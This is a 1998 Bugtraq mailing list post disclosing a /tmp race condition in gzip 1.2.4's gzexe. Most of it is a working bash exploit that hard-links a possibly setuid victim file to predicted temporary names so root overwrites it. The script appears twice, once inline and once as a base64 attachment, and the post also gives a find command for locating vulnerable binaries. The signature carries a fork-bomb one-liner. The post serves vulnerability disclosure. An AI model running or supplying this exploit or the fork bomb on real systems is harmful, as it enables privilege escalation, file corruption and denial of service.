Bugtraq mailing list archives
GZEXE - the big problem
From: lcamtuf () BOSS STASZIC WAW PL (Micha? Zalewski)
Date: Wed, 28 Jan 1998 21:41:53 +0100
This is a multi-part message in MIME format. ------=_NextPart_000_004D_01BD2C35.8C227840 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable ** DESCRIPTION ** GZEXE, part of gzip package, is a small utility which allows 'transparent' compressio any kind of executables (just like pklite under ms-dos). Unfortunatelly, it may be extremally dangerous. Here's the shell script used to decompression: if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then... [...] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ /tmp/gztmp$$ ${1+"$@"}; res=3D$? ^^^^^^^^^^^^ Just look at this... An example of badly-written one ;) It's possible to overwrite any file (including SUIDs!) with code of gzexed executable when root executes it... Then, this unwanted suid may be easily = exploited. It's also possible to enforce execution of OUR OWN code instead of=20 gzexed program, just by choosing as a victim any file not owned by user running vunerable executables, but writable by him/her. This file (even setuid) may be freely modified by attacker... Whoops! ** EXPLOIT ** -- GZEXE EXPLOIT -- #!/bin/bash # GZEXE executables exploit (gzip 1.2.4) # by Michal Zalewski (lcamtuf () staszic waw pl) # --------------------------------------------- VICTIM=3D/bin/ping GZEXED=3Da.out # Note: to locate gzexed executables you may use this: # find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut = -f 1 -d " " if [ ! -f $VICTIM ]; then echo "I can't find my victim ($VICTIM)..." exit 0 fi ORIG=3D`ls -l $VICTIM|awk '{print \$5}'` echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)." renice +20 $PPID >&/dev/null cd /tmp touch $GZEXED while:; do START=3D`ps|awk '$6=3D=3D"ps"{print $1}'` =20 let START=3DSTART+100 let DO=3DSTART+100 while [ "$START" -lt "$DO" ]; do ln $VICTIM gztmp$START &>/dev/null let START=3DSTART+1 done sleep 10 rm -f gztmp* &>/dev/null NOWY=3D`ls -l $VICTIM|awk '{print \$5}'` if [ ! "$ORIG" =3D "$NOWY" ]; then echo "Done, my master." exit 0 fi =20 done -- EOF -- It may be left in background, just like my gcc-exploit-2. Please verify vunerable executable filename (GZEXED - you may specify more than one file, separated by spaces). ** FIX ** DO NOT USE GZEXE TO COMPRESS EXECUTABLES. That's all, TMPDIR will NOT help in this case. _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] =3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] = --------=3D ------=_NextPart_000_004D_01BD2C35.8C227840 Content-Type: application/octet-stream; name="gzexeploit" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="gzexeploit" IyEvYmluL2Jhc2gKCiMgR1pFWEUgZXhlY3V0YWJsZXMgZXhwbG9pdCAoZ3ppcCAxLjIuNCkKIyBi eSBNaWNoYWwgWmFsZXdza2kgKGxjYW10dWZAc3Rhc3ppYy53YXcucGwpCiMgLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpWSUNUSU09L2Jpbi9waW5nCkdaRVhF RD1hLm91dAoKIyBOb3RlOiB0byBsb2NhdGUgZ3pleGVkIGV4ZWN1dGFibGVzIHlvdSBtYXkgdXNl IHRoaXM6CiMgZmluZCAvIC10eXBlIGYgLWV4ZWMgZ3JlcCAiL3RtcC9nenRtcFxcXCRcXFwkIFxc XCQiIHt9IFw7IC1wcmludHxjdXQgLWYgMSAtZCAiICIKCmlmIFsgISAtZiAkVklDVElNIF07IHRo ZW4KICBlY2hvICJJIGNhbid0IGZpbmQgbXkgdmljdGltICgkVklDVElNKS4uLiIKICBleGl0IDAK ZmkKCk9SSUc9YGxzIC1sICRWSUNUSU18YXdrICd7cHJpbnQgXCQ1fSdgCgplY2hvICJHWkVYRSBl eHBsb2l0IGxhdW5jaGVkIGFnYWluc3QgJFZJQ1RJTSAoJE9SSUcgYnl0ZXMpLiIKCnJlbmljZSAr MjAgJFBQSUQgPiYvZGV2L251bGwKCmNkIC90bXAKCnRvdWNoICRHWkVYRUQKCndoaWxlIDo7IGRv CgogIFNUQVJUPWBwc3xhd2sgJyQ2PT0icHMie3ByaW50ICQxfSdgCiAgCiAgbGV0IFNUQVJUPVNU QVJUKzEwMAogIGxldCBETz1TVEFSVCsxMDAKCiAgd2hpbGUgWyAiJFNUQVJUIiAtbHQgIiRETyIg XTsgZG8KICAgIGxuICRWSUNUSU0gZ3p0bXAkU1RBUlQgJj4vZGV2L251bGwKICAgIGxldCBTVEFS VD1TVEFSVCsxCiAgZG9uZQoKICBzbGVlcCAxMAoKICBybSAtZiBnenRtcCogJj4vZGV2L251bGwK CiAgTk9XWT1gbHMgLWwgJFZJQ1RJTXxhd2sgJ3twcmludCBcJDV9J2AKCiAgaWYgWyAhICIkT1JJ RyIgPSAiJE5PV1kiIF07IHRoZW4KICAgIGVjaG8gIkRvbmUsIG15IG1hc3Rlci4iCiAgICBleGl0 IDAKICBmaQogIApkb25lCg== ------=_NextPart_000_004D_01BD2C35.8C227840--
Current thread:
- Re: Simple OpenBSD crash script, (continued)
- Re: Simple OpenBSD crash script GvS One (Jan 28)
- Quake 2 Linux kevingeo () CRUZIO COM (Jan 25)
- Re: Quake 2 Linux Greg Alexander (Jan 27)
- Announcement: Phrack 52 route () RESENTMENT INFONEXUS COM (Jan 26)
- Microsoft responds to bug in Exchange Server Tony Hagale (Jan 27)
- Re: Announcement: Phrack 52 Olaf Kirch (Jan 28)
- KSR[T] Advisory #7: filter KSR[T] (Jan 29)
- Bug in IMail's pop3d32.exe RHS Linux User (Jan 29)
- Secure Linux patch Solar Designer (Jan 29)
- Gaining Domain Admins access on LAN (fwd) Weld Pond (Jan 28)
- GZEXE - the big problem Micha? Zalewski (Jan 28)
- Re: Correction: CPSN 9:971208: Solaris /var Permission Problems Tom Perrine (Jan 13)